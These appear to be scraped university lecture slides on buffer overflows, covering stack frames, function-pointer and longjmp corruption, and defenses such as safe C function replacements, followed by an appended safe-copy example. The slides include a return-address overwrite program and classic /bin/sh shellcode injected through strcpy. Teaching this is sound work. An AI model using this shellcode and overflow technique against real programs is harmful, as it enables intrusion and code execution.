
Topics in Security Testing

2025-10-15 16:58

[Preview] Topics in Security Testing. Computer Security. assets (e.g., servers, applications, web pages, data). from: – corruption – unauthorized access – malicious software – hardware mechanisms (e.g., biometrics). programs (e.g., role-based access control). trustworthy. the security policy. constraints. (e.g., encryption, firewalls) need to be. and comprises: – subsystems. e.g., web servers, application servers, DBMS, directories, web applications, and legacy applications. encryption methods, audit, logging, monitoring, intrusion detection, registration, backup, recovery. Example of a Security Architecture. Validating Security Architecture. automated) inspection process, similar to code. Threat modeling. the course. Identify the assets. computing resources, trade secrets, financial data. – e.g., identify data flows, encryption pr

  

[Body] with larger memory

Heap
• Dynamic memory allocation
• malloc() in C and new in C++
• More flexibility
• More stable data storage – memory allocated in the heap remains in existence for the duration of a program
• Data with unknown lifetime – global (storage class external) and static variables

Stack – I
• Provides high-level abstraction
  – Allocates local variables when a function gets called (with known lifetime)
  – Passes parameters to functions
  – Returns values from functions
• Push/Pop operations (LIFO) – implemented by CPU
• Size – dynamically adjusted by kernel at runtime

Stack – II
• Stack Pointer (SP) – TOP of stack (or next free available address)
• Fixed address – BOTTOM of stack
• Logical Stack Frame (SF) – contains parameters to functions, local variables, data to recover previous SF (e.g., instruction pointer at time of function call)
• Frame Pointer (FP)/local Base Pointer (BP) – Beginning of Activation Record (AR), used for referencing local variables and parameters (accessed as offsets from BP)

Activation record
• Contains all info local to a single invocation of a procedure
  – Return address
  – Arguments
  – Return value
  – Local variables
  – Temp data
  – Other control info

Accessing an activation record
• Base pointer: beginning of AR
  – Arguments are accessed as offsets from bp
• Environment pointer: pointer to the most recent AR (usually a fixed offset from bp)
• Stack pointer: top of AR stack
  – Temporaries are allocated on top of stack

When a procedure is called
• Previous FP is saved
• SP is copied into FP → new FP
• SP advances to reserve space for local variables
• Upon procedure exit, the stack is cleaned up

Function pointer
• Find a buffer adjacent to function pointer in stack, heap or static data area
• Overflow buffer to change the function pointer so it jumps to desired location
• Example: attack against superprobe program – Linux

Longjmp buffer
• setjmp(buffer) to set a checkpoint
• longjmp(buffer) to go back to checkpoint
• Corrupt state of buffer so that longjmp(buffer) jumps to the attack code instead

Example

    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
    }

    void main() {
        function(1,2,3);
    }

    # main: push the arguments right to left, then call
    pushl $3
    pushl $2
    pushl $1
    call function

    # function prologue: save old frame pointer, set the new one, reserve locals
    pushl %ebp
    movl %esp,%ebp
    subl $20,%esp

Buffer overflow example

    #include <stdio.h>

    void function(int a, int b, int c) {
        char buffer1[5];
        char buffer2[10];
        int *ret;

        /* point ret at the saved return address (offset depends on the
           32-bit x86 stack layout shown above) */
        ret = (int *)(buffer1 + 12);
        /* advance the return address past the "x = 1" assignment */
        (*ret) += 8;
    }

    void main() {
        int x;

        x = 0;
        function(1,2,3);
        x = 1;
        printf("%d\n", x);
    }

Result of program
• Output: 0
• Return address has been modified and the flow of execution has been changed
• All we need to do is place the code that we are trying to execute in the buffer we are overflowing, and modify the return address so it points back to buffer

Example [6]

    #include <string.h>

    char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    char large_string[128];

    void main() {
        char buffer[96];
        int i;
        long *long_ptr = (long *) large_string;
        /* long_ptr takes the address of large_string */

        /* large_string is filled with 32 copies of the address of buffer */
        for (i = 0; i < 32; i++)
            *(long_ptr + i) = (int) buffer;

        /* copy the contents of shellcode into large_string */
        for (i = 0; i < strlen(shellcode); i++)
            large_string[i] = shellcode[i];

        /* buffer gets the shellcode and 32 pointers back to itself */
        strcpy(buffer, large_string);
    }

Example illustrated [6]
[Figure: process address space (user stack, heap, bss) showing argc, RA, sfp, long_ptr, i, buffer, large_string[128] and shellcode[]]

Buffer overflow defenses
• Writing correct code (good programming practices)
• Debugging Tools
• Nonexecutable buffers
• Array bounds checking
• Code pointer integrity checking (e.g., StackGuard)

Problems with C
• Some C functions are problematic
  – Static size buffers
  – Do not have built-in bounds checking
• While loops
  – Read one character at a time from user input until end of line or end of file
  – No explicit checks for overflows

Some problematic C functions

Function                     | Severity                                  | Solution: Use
gets                         | Most Risky                                | fgets(buf, size, stdin)
strcpy, strcat               | Very Risky                                | strncpy, strncat
sprintf, vsprintf            | Very Risky                                | snprintf, vsnprintf or precision specifiers
scanf family                 | Very Risky                                | precision specifiers or do own parsing
realpath, syslog             | Very Risky (depending on implementation)  | Maxpathlen and manual checks
getopt, getopt_long, getpass | Very Risky (depending on implementation)  | Truncate string inputs to reasonable size

Good programming practices – I (useful to know for code inspections)

DO NOT USE:

    void main() {
        char buf[40];
        gets(buf);
    }

Instead USE:

    void main() {
        char buf[40];
        fgets(buf, 40, stdin);
    }

DO NOT USE:

    void main() {
        char buf[4];
        char src[8] = "rrrrr";
        strcpy(buf, src);
    }

Instead USE:

    if (src_size >= buf_size) {
        cout << "error";
        return(1);
    } else {
        strcpy(buf, src);
    }

OR

    strncpy(buf, src, buf_size - 1);
    buf[buf_size - 1] = '\0';

Good programming practices – II
DO NOT USE: Instead USE:

Debugging tools
• More advanced debugging tools
  – Fault injection tools – inject deliberate buffer overflow faults at random to search for vulnerabilities
  – Static analysis tools – detect overflows
• Can only minimize the number of overflow vulnerabilities but cannot provide total assurance

Nonexecutable buffers
• Make data segment of program's address space nonexecutable → attacker can't execute code injected into input buffer (compromise between security and compatibility)

Nonexecutable buffers
• If code already in program, attacks can b
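
The substitutions from the problematic-functions table and the "Good programming practices – I" slide above, as an added C example that is not part of the original slides; the helper names bounded_copy, bounded_format and read_line are hypothetical. Unlike the slide's strncpy form, which truncates without telling the caller, each helper reports input that does not fit.

```c
/* Added example; helper names are hypothetical, not from the slides. */
#include <stdio.h>
#include <string.h>

/* strcpy replacement: 0 on success, -1 if src (plus NUL) does not fit.
 * Unlike strncpy, it never leaves dst unterminated or silently truncated. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= dst_size) {
        dst[0] = '\0';                 /* reject instead of truncating */
        return -1;
    }
    memcpy(dst, src, n + 1);           /* n + 1 copies the terminator */
    return 0;
}

/* sprintf replacement: snprintf returns the length it wanted to write,
 * so a result >= dst_size means the output was cut short. */
int bounded_format(char *dst, size_t dst_size, const char *user, int id)
{
    int need = snprintf(dst, dst_size, "user=%s id=%d", user, id);
    return (need < 0 || (size_t)need >= dst_size) ? -1 : need;
}

/* gets replacement: length of the line (newline stripped), -1 on EOF or
 * error, -2 if the line was longer than the buffer (the rest is discarded). */
int read_line(FILE *in, char *buf, size_t size)
{
    if (size < 2 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
        return (int)len;
    }
    int c, extra = 0;                  /* no newline seen: drain the line */
    while ((c = getc(in)) != EOF && c != '\n')
        extra = 1;
    return extra ? -2 : (int)len;
}

int main(void)
{
    char buf[4];                       /* same size as the slide's buf */
    printf("%d %d\n", bounded_copy(buf, sizeof buf, "rrrrr"),
           bounded_copy(buf, sizeof buf, "abc"));
}
```

Draining the rest of an over-long line in read_line keeps the leftover bytes from being read as the next input line.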